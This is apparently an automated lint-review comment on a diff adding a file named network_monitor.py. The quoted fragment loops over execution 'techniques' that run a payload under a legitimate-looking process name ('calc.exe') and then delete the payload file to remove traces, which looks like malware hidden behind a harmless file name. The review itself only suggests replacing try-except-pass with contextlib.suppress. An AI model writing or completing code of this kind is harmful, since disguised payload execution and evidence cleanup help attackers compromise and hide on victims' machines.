network_monitor.py

```
@@ -0,0 +1,299 @@
+                lambda: self.execute_with_legit_process(payload_path, "calc.exe")
+            ]
+            
+            for technique in techniques:
+                try:
+                    if technique():
+                        # 清理临时文件
+                        time.sleep(2)
+                        try:
+                            os.remove(payload_path)
+                        except:
+                            pass
```

Ruff (0.12.2)

Use `contextlib.suppress(BaseException)` instead of `try`-`except`-`pass`

Replace with `contextlib.suppress(BaseException)`

(SIM105)